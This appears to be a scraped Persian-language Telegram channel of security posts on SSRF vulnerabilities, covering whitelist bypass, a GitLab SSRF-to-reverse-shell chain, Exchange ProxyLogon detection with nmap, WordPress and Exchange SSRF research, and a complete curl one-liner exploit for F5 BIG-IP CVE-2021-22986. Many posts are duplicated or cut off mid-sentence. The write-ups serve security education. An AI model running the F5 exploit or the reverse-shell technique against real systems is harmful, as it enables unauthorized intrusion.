#Whitelist_URL Bypassing
در بسیاری از مواقع وبسایت های حساس تا جایی که خدمات سرویس دهی آنها مختل نشود محدودیت و Policy هایی برای وبسرویس خود وضع میکنند,
در چنین شرایط اگر آسیب پذیری هایی مانند #Server_Side_Request_Forgery رخ بده هکر نمیتونه اون رو Pentest و یا پایلود ریزی موفق داشته باشه, چرا که در خصوص مثلا وبسایت هایی که دارای مجوز برای پارس کردن یه Request ,از سمت سرور دارند یک #Whitelist تعریف شده، این یک مکانیزم #SSRF_Protection هستش نه #CSP
در چنین شرایطی هکر میتونه با استفاده از Map کردن و زیر نظر گرفتن عملکرد وبسرویس ها, وبسایت Valid رو شناسایی و بر روی زیر دامنه ها به دنبال آسیب پذیری هایی مانند #Open_Redirect گشته و در صورت پیدایش به واسطه آسیب پذیری دوم یک Redirect به سرور هکر زده و تست آسیب پذیری #SSRF رو بر روی پروتکل های لیست شده، با بایپس محدودیت ها انجام داد, این سناریو رو میتونید در تصویر پست مشاهده کنید,
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
@Unk9vvN
در بسیاری از مواقع وبسایت های حساس تا جایی که خدمات سرویس دهی آنها مختل نشود محدودیت و Policy هایی برای وبسرویس خود وضع میکنند,
در چنین شرایط اگر آسیب پذیری هایی مانند #Server_Side_Request_Forgery رخ بده هکر نمیتونه اون رو Pentest و یا پایلود ریزی موفق داشته باشه, چرا که در خصوص مثلا وبسایت هایی که دارای مجوز برای پارس کردن یه Request ,از سمت سرور دارند یک #Whitelist تعریف شده، این یک مکانیزم #SSRF_Protection هستش نه #CSP
در چنین شرایطی هکر میتونه با استفاده از Map کردن و زیر نظر گرفتن عملکرد وبسرویس ها, وبسایت Valid رو شناسایی و بر روی زیر دامنه ها به دنبال آسیب پذیری هایی مانند #Open_Redirect گشته و در صورت پیدایش به واسطه آسیب پذیری دوم یک Redirect به سرور هکر زده و تست آسیب پذیری #SSRF رو بر روی پروتکل های لیست شده، با بایپس محدودیت ها انجام داد, این سناریو رو میتونید در تصویر پست مشاهده کنید,
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
@Unk9vvN
#RCE on #SSRF
نمونه ای از پیاده سازی Remote Code Execution بر بستر آسیب پذیری #SSRF که منجر به دسترسی Shell بر پایه ابزار #NC شده است,
از نکات جالب این پایلود میشود به اولین نکته یعنی اشاره پارامتر import_url به پورت درحال گوش دادن هکر اشاره کرد که به واسطه سرویس git انجام میگیره, این پارامتر import_url در برنامه Gitlab دارای آسیب پذیری #SSRF بوده و اولین قدم سوءاستفاده رو هکر برداشته,
اما مورد دوم که اصل قضیه هستش اینه که هکر با استفاده از resque و queue خود برنامه Gitlab اقدام به تعریف یک class کرده و در ساختار Json Base اون پارامتر args رو معادل class_eval برای اجرای مستقیم کد خودش قرار داده , و باز در ادامه مقدار setsid python... خودش رو در ورودی تابع open قرار داده که اول تابع مقداری بصورت پیشفرض برای Pars شده تعریف نشده در نتیجه هکر با یه Pipe اشاره به کد خودش میکنه, و بعد از اجرای nc.py با آی پی و پورت هکر تابع رو read میکنه و با استفاده از system_hook_push تعریف شده در gitlab پروسس خودش رو به اجرا در میاره ,
لازم به ذکر که بگم استفاده از تعریف queues و resque در URI آسیب پذیر محیا بوده...
@Unk9vvN
نمونه ای از پیاده سازی Remote Code Execution بر بستر آسیب پذیری #SSRF که منجر به دسترسی Shell بر پایه ابزار #NC شده است,
از نکات جالب این پایلود میشود به اولین نکته یعنی اشاره پارامتر import_url به پورت درحال گوش دادن هکر اشاره کرد که به واسطه سرویس git انجام میگیره, این پارامتر import_url در برنامه Gitlab دارای آسیب پذیری #SSRF بوده و اولین قدم سوءاستفاده رو هکر برداشته,
اما مورد دوم که اصل قضیه هستش اینه که هکر با استفاده از resque و queue خود برنامه Gitlab اقدام به تعریف یک class کرده و در ساختار Json Base اون پارامتر args رو معادل class_eval برای اجرای مستقیم کد خودش قرار داده , و باز در ادامه مقدار setsid python... خودش رو در ورودی تابع open قرار داده که اول تابع مقداری بصورت پیشفرض برای Pars شده تعریف نشده در نتیجه هکر با یه Pipe اشاره به کد خودش میکنه, و بعد از اجرای nc.py با آی پی و پورت هکر تابع رو read میکنه و با استفاده از system_hook_push تعریف شده در gitlab پروسس خودش رو به اجرا در میاره ,
لازم به ذکر که بگم استفاده از تعریف queues و resque در URI آسیب پذیر محیا بوده...
@Unk9vvN
#Exchange Server #SSRF Vulnerability
در روزهای گذشته خبر هک شدن بسیاری از سرویس های Exchange Server ماکروسافت به واسطه چند آسیب پذیری زنجیر وار پخش شده که توجهات رو به خودش جلب کرده,
موضوعی که در این حمله که گفته میشه از طرف کشور چین بوده, اول از همه اینکه آسیب پذیری Initial Access یک SSRF بوده که بواسطه اون هکر میتونسته بصورت unauthenticated دسترسی به ECP پیدا کنه و بواسطه آسیب پذیری دومی که از نوع post-authentication arbitrary write file بوده اطلاعات احراز ادمین ها رو دزدیده و در نهایت با استفاده از یک آسیب پذیری deserialization اقدام به اجرای کد سطح SYSTEM بکنه, ماکروسافت اسکریپتی رو برای شناسایی سرورهای آسیب پذیر طراحی کرده
┌──(unk9vvn㉿avi)-[~]
└─$
└─$
@Unk9vvN
در روزهای گذشته خبر هک شدن بسیاری از سرویس های Exchange Server ماکروسافت به واسطه چند آسیب پذیری زنجیر وار پخش شده که توجهات رو به خودش جلب کرده,
موضوعی که در این حمله که گفته میشه از طرف کشور چین بوده, اول از همه اینکه آسیب پذیری Initial Access یک SSRF بوده که بواسطه اون هکر میتونسته بصورت unauthenticated دسترسی به ECP پیدا کنه و بواسطه آسیب پذیری دومی که از نوع post-authentication arbitrary write file بوده اطلاعات احراز ادمین ها رو دزدیده و در نهایت با استفاده از یک آسیب پذیری deserialization اقدام به اجرای کد سطح SYSTEM بکنه, ماکروسافت اسکریپتی رو برای شناسایی سرورهای آسیب پذیر طراحی کرده
┌──(unk9vvn㉿avi)-[~]
└─$
sudo wget https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse -O /usr/share/nmap/scripts/http-vuln-cve2021-26855.nse
┌──(unk9vvn㉿avi)-[~]└─$
nmap -p 443 --script http-vuln-cve2021-26855 -Pn $TARGET
https://us-cert.cisa.gov/ncas/alerts/aa21-062a@Unk9vvN
#F5_iControl #REST Unauthenticated RCE (#SSRF) #CVE_2021_22986
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
@Unk9vvN
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.
┌──(unk9vvn㉿avi)-[~]
└─$
token=`curl -i -k -s -X $'POST' -H "Host: $TARGET" -H $'Accept-Language: en' -H $'Authorization: Basic YWRtaW46' -H $'Content-Type: application/json' -H $'Content-Length: 109' -H $'Connection: close' -b $'BIGIPAuthCookie=1234' --data-binary $'{\"username\":\"admin\",\x0d\x0a\"userReference\":{},\x0d\x0a\"loginReference\":{\"link\":\"http://$TARGET/mgmt/shared/gossip\"}\x0d\x0a}' "http://$TARGET/mgmt/shared/authn/login" | grep "{" | jq .token.token| sed 's/"//g'`;echo $token;curl -s -H "X-F5-Auth-Token: $token" -H "Content-Type: application/json" "http://$TARGET/mgmt/tm/util/bash" -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .commandResult
https://support.f5.com/csp/article/K03009991@Unk9vvN
#Wordpress Core #Unauthenticated Blind #SSRF
اخیرا تحقیقاتی منتشر شده از Simon Scannell و Thomas Chauchefoin که میپردازد به یک آسیب پذیری در هسته سیستم مدیریت محتوای وردپرس که از نوع Blind SSRF بوده و بصورت Unauthenticated امکان Trigger شدن رو میده البته بواسطه تکنیک DNS Rebinding.
این آسیب پذیری در ویژگی pingback در API نقطه انتهایی XML-RPC هستش، محقق مطرح میکنه که در جریان عملیاتی کردن این روش
نکته دیگر اینکه کد Backend، یک Handle کننده درخواست های
مهاجم بواسطه Validate اشتباه در جریان دریافت مقادیر، این امکان رو پیدا کرده تا با پیاده سازی وضعیت رقابتی، درخواست های متعدد خودش رو مبنی بر مجبور کردن ارسال یک درخواست جعلی، از سرور قربانی به DNS Server خودش رو پیاده سازی کنه (Race Condition) که به عبارتی یک SSRF میزنه.
@Unk9vvN
اخیرا تحقیقاتی منتشر شده از Simon Scannell و Thomas Chauchefoin که میپردازد به یک آسیب پذیری در هسته سیستم مدیریت محتوای وردپرس که از نوع Blind SSRF بوده و بصورت Unauthenticated امکان Trigger شدن رو میده البته بواسطه تکنیک DNS Rebinding.
این آسیب پذیری در ویژگی pingback در API نقطه انتهایی XML-RPC هستش، محقق مطرح میکنه که در جریان عملیاتی کردن این روش
pingback.ping، امکان اینکه دو مقدار یا value برای این Method تعریف بشه وجود داره.نکته دیگر اینکه کد Backend، یک Handle کننده درخواست های
pingback، وجود داره که دارای یک ویژگی از PHP است با نام Requests_Transport_cURL این ویژگی برای کتابخونه Requests استفاده شده و بواسطه Requests_Transport_fsockopen درخواست pingback رو Handle میکنه.مهاجم بواسطه Validate اشتباه در جریان دریافت مقادیر، این امکان رو پیدا کرده تا با پیاده سازی وضعیت رقابتی، درخواست های متعدد خودش رو مبنی بر مجبور کردن ارسال یک درخواست جعلی، از سرور قربانی به DNS Server خودش رو پیاده سازی کنه (Race Condition) که به عبارتی یک SSRF میزنه.
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Unpatched #Powerful #SSRF in #Exchange
اخیرا یک آسیب پذیری از مایکروسافت Exchange مطرح شده که محقق اعلام میکنه، مایکروسافت آسیب پذیری SSRF کشف شده رو در سطح حساسیت بالا نمیدونه و اصلاح نمیکند.
آسیب پذیری در Attachment ایجاد ایمیل است که با تابع
در تابع
در این تابع یک تماس با
نهایتا در asynchronous task یک پیاده سازی از کلاس
@Unk9vvN
اخیرا یک آسیب پذیری از مایکروسافت Exchange مطرح شده که محقق اعلام میکنه، مایکروسافت آسیب پذیری SSRF کشف شده رو در سطح حساسیت بالا نمیدونه و اصلاح نمیکند.
آسیب پذیری در Attachment ایجاد ایمیل است که با تابع
CreateAttachmentFromUri فعال شده و از Methods های Exchange OWAService استفاده میکند.در تابع
CreateAttachmentFromUri یک Initialize برای تماس با Execute method پیاده سازی میشود که تماسی با تابع InternalExecute گرفته خواهد شد.در این تابع یک تماس با
CreateAttachmentFromUri.DownloadAndAttachFileFromUri گرفته میشود و پارامتر های uri ، name ، subscriptionId و غیره به آن پاس داده میشود که ورودی uri برای مهاجم مهم است.نهایتا در asynchronous task یک پیاده سازی از کلاس
HttpClient ساخته میشود، بعد uri پاس داده شده مهاجم در httpResponseMessage ریخته شده و در نهایت در تابع CreateAttachmentAndSendPendingGetNotification داده دریافتی از Get HTTP به عنوان یک Pending Notification ایجاد خواهد شد.@Unk9vvN